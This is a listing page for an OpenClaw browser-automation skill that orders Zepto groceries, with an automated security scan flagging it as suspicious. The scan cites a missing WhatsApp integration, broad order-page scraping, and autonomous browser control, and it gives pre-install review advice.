Zepto
v1.0.6Order groceries from Zepto in seconds. Just say what you need, get a payment link on WhatsApp, pay on your phone, done. Remembers your usual items. Works across India where Zepto delivers.
⭐ 2· 1.5k·1 current·1 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Suspicious
medium confidencePurpose & Capability
The skill name/description (Zepto grocery ordering) matches the code and SKILL.md: it automates Zepto via the OpenClaw browser tool and stores a local order history. It requests only browser.enabled (expected). However, SKILL.md/README claim it will "send payment links via WhatsApp" but the included codebase does not contain an explicit WhatsApp API integration or code that clearly constructs/sends WhatsApp messages; the README relies on a pre-configured WhatsApp channel at the platform level. This is plausible but not implemented in the repo — an implementation gap the user should verify.
Instruction Scope
The runtime instructions and code perform DOM scraping of the user's Zepto account pages (visiting delivered order URLs and extracting lines of text) and then write aggregated data to a local file ({SKILL_DIR}/order-history.json). While extracting item names is the stated purpose, the scraper visits full order pages and could inadvertently capture additional personal data (addresses, order metadata) unless the extraction is strictly filtered. The SKILL.md/SECURITY.md assert only item names are stored, but that guarantee depends on the scraper's correctness — the scraping instructions are broad and could capture more than claimed.
Install Mechanism
There is no install spec (instruction-only install) — the code runs using Node.js and the OpenClaw browser tool already present. No remote downloads or external install URLs are present. That lowers surface risk; however the package contains executable agent code (zepto-agent.js, zepto-ops.js) which will be run locally and can control the browser and write files.
Credentials
The skill requests no environment secrets and only needs browser.enabled, which is appropriate for a browser automation skill. However, browser control is a high-scope permission: any skill with browser access can interact with arbitrary sites the logged-in user has sessions for (cookies, other services). The declared lack of credential access (no OTP storage, no payment storage) is reasonable, but you must trust that the skill's scraping and parsing logic won't capture or persist extra sensitive info from pages.
Persistence & Privilege
The skill is not marked always:true and does not request background cron jobs; the PUBLISH_CHECKLIST and SECURITY.md assert no persistent background jobs. However, the repo includes an autonomous executor (zepto-agent.js described as "Autonomous Task Executor") and the platform default allows model invocation. That means the skill —if the model or agent is permitted— could run these browser actions autonomously. This is expected for skills but increases blast radius; if you don't want autonomous browser actions, consider disabling model invocation for this skill.
What to consider before installing
What to check before installing/using this skill:
1) WhatsApp sending: verify how payment links are sent. The SKILL.md claims WhatsApp will receive the link, but the repo lacks explicit WhatsApp-sending code — confirm your platform-level WhatsApp channel is configured and that the skill will not ask you to paste credentials or send messages via an untrusted third party.
2) Review scraping behavior: the skill visits your Zepto account order pages and scrapes DOM text. Inspect zepto-parser.js and the scraping steps to ensure only item names and counts are saved. If you have sensitive address or order metadata in those pages, test scraping in a disposable account or profile first.
3) Check local storage: order-history.json is written to your skill directory (~/.openclaw/skills/zepto/). Inspect the file after running and delete it if you don't want a local shopping history. Make sure it doesn't accidentally include addresses/phone numbers.
4) Limit autonomous actions: if you are uncomfortable with the skill acting without an explicit prompt, disable autonomous invocation for this skill in your agent settings (or run it only on-demand). The code contains an agent component capable of performing browser actions.
5) Test in a safe environment: run initial tests with a throwaway Zepto account or in a separate browser profile to observe behavior, and watch for unexpected network activity or captured data.
6) Code review: if you will rely on this skill, have someone with Node/browser-automation familiarity quickly review zepto-agent.js, zepto-ops.js, and zepto-parser.js to validate that only the intended fields are captured and that no hidden network endpoints or credentials are used.
If you can't verify the WhatsApp flow or are unable to confirm the scraper only captures item names, treat the skill with caution.Like a lobster shell, security has layers — review code before you run it.
latestvk975szqf51qbe7ekg0b6x7n4p980vgz7
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
Runtime requirements
🛒 Clawdis
Configbrowser.enabled